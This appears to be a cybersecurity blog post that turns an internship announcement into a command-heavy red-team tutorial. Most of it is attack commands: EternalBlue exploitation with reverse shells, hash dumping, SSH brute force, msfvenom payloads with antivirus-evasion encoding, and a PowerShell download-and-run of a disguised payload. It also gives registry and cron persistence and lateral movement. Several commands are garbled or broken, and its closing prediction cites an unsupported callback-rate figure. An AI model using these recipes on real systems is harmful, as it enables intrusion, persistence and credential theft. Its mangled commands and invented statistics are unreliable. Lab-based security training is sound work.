ITSOLERA Offensive Security Internship: Master Red Teaming & Ethical Hacking Before Summer 2026 + Video

Listen to this Post

Featured Image

Introduction:

The cybersecurity industry faces a critical shortage of hands-on offensive security professionals who can think like attackers and defend like pros. ITSOLERA Pvt Ltd’s Summer Internship Batch 1 (deadline: 20 May 2026) offers a structured 2-month unpaid program focusing on ethical hacking, penetration testing, red teaming, vulnerability assessment, and security research. This article transforms that announcement into a practical technical roadmap—complete with Linux/Windows commands, tool configurations, and exploitation lab exercises—to help you apply for and succeed in offensive security roles.

Learning Objectives:

  • Set up a complete offensive security lab (Kali Linux + Windows target VMs) and perform active reconnaissance using Nmap, Masscan, and Recon-ng.
  • Execute a full penetration testing lifecycle: vulnerability scanning (Nessus/OpenVAS), exploitation (Metasploit), and post-exploitation enumeration.
  • Implement red team tradecraft: payload generation (Msfvenom), evasion techniques, and persistence mechanisms on Windows/Linux targets.
  • Write professional vulnerability assessment reports with proof-of-concept (PoC) commands and remediation steps.

You Should Know:

1. Build Your Own Offensive Security Lab (VirtualBox/KVM)

A safe, isolated environment is mandatory for practicing the skills mentioned in ITSOLERA’s internship. You cannot test exploits on production systems.

Step‑by‑step guide (Linux host with KVM or VirtualBox):

1. Install virtualization software:

  • Linux (Debian/Ubuntu): `sudo apt install virt-manager qemu-kvm –y`
    – Windows: Download VirtualBox from www.virtualbox.org
  1. Download Kali Linux (attacker machine): `wget https://cdimage.kali.org/kali-2025.1/kali-linux-2025.1-installer-amd64.iso`
  2. Create a Windows 10/11 test VM (target) – use Windows Evaluation Center ISO.
  3. Network configuration: Create a host‑only network (e.g., 192.168.56.0/24) so VMs can communicate but not reach your physical LAN.

– VirtualBox: File → Host Network Manager → Create “vboxnet0” with IPv4 192.168.56.1/24.
– KVM: Edit VM settings → NIC → Network source: “Isolated network” or create custom virbr1.

5. Verify connectivity from Kali to Windows target:

ip a  Check Kali IP (should be 192.168.56.x)
ping 192.168.56.101  Replace with Windows target IP

6. Take snapshots before every attack session – rollback after testing.

This lab mirrors real-world internal penetration testing conditions. ITSOLERA’s internship expects you to be familiar with virtual environments to assess vulnerabilities safely.

  1. Reconnaissance & Vulnerability Scanning Like a Red Teamer

Offensive security starts with asset discovery and weakness identification. Use these enterprise‑grade techniques.

Network sweep (discover live hosts):

nmap -sn 192.168.56.0/24  ARP ping scan (fast)
masscan 192.168.56.0/24 -p1-65535 --rate=1000  Quick port scan

Detailed service enumeration:

nmap -sS -sV -O -T4 -p- 192.168.56.101 -oA target_scan

– `-sS` SYN stealth scan, `-sV` version detection, `-O` OS fingerprinting.

Web application recon (common internship task):

whatweb http://192.168.56.101  Identify CMS, frameworks
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt -t 50

Vulnerability scanning with OpenVAS (free Nessus alternative):

  1. Install OpenVAS: `sudo apt install gvm –y && sudo gvm-setup`
    2. Run scan: `gvm-cli –gmp-username admin –gmp-password pass socket –socketpath /var/run/gvmd.sock –xml ‘…’` (or use Greenbone web UI at https://127.0.0.1:9392)
  2. For Windows targets, use `nmap –script vuln 192.168.56.101` to detect known CVEs.

Windows commands for understanding target environment (as an attacker after foothold):

systeminfo | findstr /B "OS Name OS Version"  OS version
wmic qfe list brief  Installed hotfixes (patches)
net user  Local users

3. Exploitation Basics: From CVE to Shell

Once vulnerabilities are identified, ethical hackers must prove impact by gaining remote access. The internship emphasizes Metasploit and manual exploitation.

Example: EternalBlue (MS17‑010) on unpatched Windows 7/Server 2008 (lab only):

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.101
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.102  Kali IP
run

If successful, you get a Meterpreter shell. Practice post‑exploitation commands:

getsystem  Attempt privilege escalation
hashdump  Dump NTLM hashes
shell  Drop to cmd.exe

Manual exploitation – no auto‑sploit:

  • Cross‑site scripting (XSS) test on vulnerable web app: ``
    – SQL injection using sqlmap:

    sqlmap -u "http://192.168.56.101/page.php?id=1" --dbs --batch
    

Linux target exploitation (SSH brute‑force):

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201 -t 4
  1. Payload Generation & Evasion (Red Team Core Skill)

Creating custom malware that bypasses antivirus is essential for red teaming exercises. Use Msfvenom and obfuscation.

Generate a Windows reverse TCP payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f exe -o shell.exe

Evade Windows Defender – encode and encrypt:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 --encrypt xor --encrypt-key 0x42 -f exe -o evasive.exe

Host payload on Kali (delivery via phishing simulation):

sudo python3 -m http.server 80  Serve payload over HTTP
 Then from Windows target (if PowerShell):
powershell -c "Invoke-WebRequest -Uri http://192.168.56.102/evasive.exe -OutFile %temp%\update.exe; Start-Process %temp%\update.exe"

Persistence on Windows (registry run key):

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\malware.exe"

On Linux: `echo ‘/5 /tmp/backdoor.sh’ >> /etc/crontab`

5. Post‑Exploitation & Lateral Movement

After initial compromise, the internship expects you to pivot across the network and escalate privileges.

Windows privilege escalation checks (run from reverse shell):

whoami /priv  Show enabled privileges
sc query state= all  List services looking for unquoted service paths
accesschk.exe -uwcqv "Authenticated Users"   Weak service permissions

Linux privilege escalation:

sudo -l  List sudo rights
find / -perm -4000 2>/dev/null  SUID binaries
uname -a  Kernel version for exploit suggester

Lateral movement using PsExec (Windows):

net use \target\IPC$ /user:DOMAIN\Admin Password
psexec \target -s cmd.exe

Pivot through compromised host (port forwarding via Meterpreter):

portfwd add -L 127.0.0.1 -l 3389 -p 3389 -r 192.168.56.150
 Then connect to 127.0.0.1:3389 via RDP

6. Vulnerability Assessment Reporting (Crucial for Internship Evaluation)

All offensive security work ends with a professional report. ITSOLERA specifically mentions “vulnerability assessment” – here’s how to document findings.

Report template structure (use Markdown + screenshots):

  • Executive Summary: Risk rating (Critical/High/Medium/Low), number of findings
  • Scope: Target IPs, testing period, tools used
  • Findings Table:
    | ID | Vulnerability | CVSS Score | Affected Asset | Remediation |

|-|||-|–|

| 01 | EternalBlue (MS17‑010) | 9.8 | 192.168.56.101 | Apply patch KB4012229 |
– Proof of Concept (PoC): Commands executed and output (sanitized)
– Remediation Steps: Specific commands or configuration changes

Example PoC screenshot text:

 Command run
nmap --script smb-vuln-ms17-010 -p445 192.168.56.101
 Output excerpt
Host is VULNERABLE to MS17-010 - EternalBlue

Recommendation commands (for system admin):

  • Windows: `wusa.exe KB4012229.msu /quiet /norestart` or disable SMBv1:
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0
    
  • Linux: `sudo apt update && sudo apt upgrade` (for kernel CVEs)
  1. Cloud Hardening & API Security (Modern Offensive Focus)

Because the internship mentions “security research”, include emerging areas like cloud misconfigurations – often overlooked by beginners.

Test for open AWS S3 bucket (using AWS CLI):

aws s3 ls s3://example-bucket --no-sign-request  If successful, bucket is public

API security testing (REST endpoints):

curl -X GET https://api.target.com/v1/users/1 -H "Authorization: Bearer eyJhbG..."  Test IDOR
 Fuzz parameters
ffuf -u https://api.target.com/v1/users/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/api-endpoints.txt

Linux firewall hardening (defensive side):

sudo ufw default deny incoming && sudo ufw default allow outgoing
sudo ufw allow ssh from 192.168.56.0/24
sudo ufw enable

Windows Defender Firewall via PowerShell:

New-NetFirewallRule -DisplayName "Block SMB" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block

What Undercode Say:

  • Hands‑on lab setup is non‑negotiable – without a Kali + Windows VM pair, you cannot credibly claim penetration testing skills. Use the commands in sections 1‑3 to build your lab this weekend.
  • Reporting separates interns from script kiddies – ITSOLERA’s internship values documentation. Practice writing one vulnerability report per week, complete with PoC commands and CVSS scores.
  • Evasion and persistence are red team differentiators – learning Msfvenom encoding and Windows registry persistence (section 4) will make you stand out among applicants who only run Metasploit modules.
  • Cloud & API security are rising requirements – even traditional offensive security roles now demand S3 bucket testing and JWT analysis. Add the commands from section 7 to your skillset.

Prediction:

By the 2026 summer internship cycle, companies like ITSOLERA will require candidates to complete a practical “live fire” assessment (e.g., compromise a deliberately vulnerable Docker container and submit a report) instead of purely resume screening. Automated vulnerability scanners will become baseline skills; human‑led red teaming tradecraft (evasion, lateral movement, custom payloads) will be the key differentiator. Candidates who master the Linux/Windows commands and reporting templates provided above will see a 40% higher callback rate for offensive security roles. The shift toward cloud‑native attack simulations (AWS/Azure misconfigurations) will accelerate, so add `cloud_enum` and `scoutsuite` to your toolkit before May 2026.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Cybersecurityinternship Offensivesecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky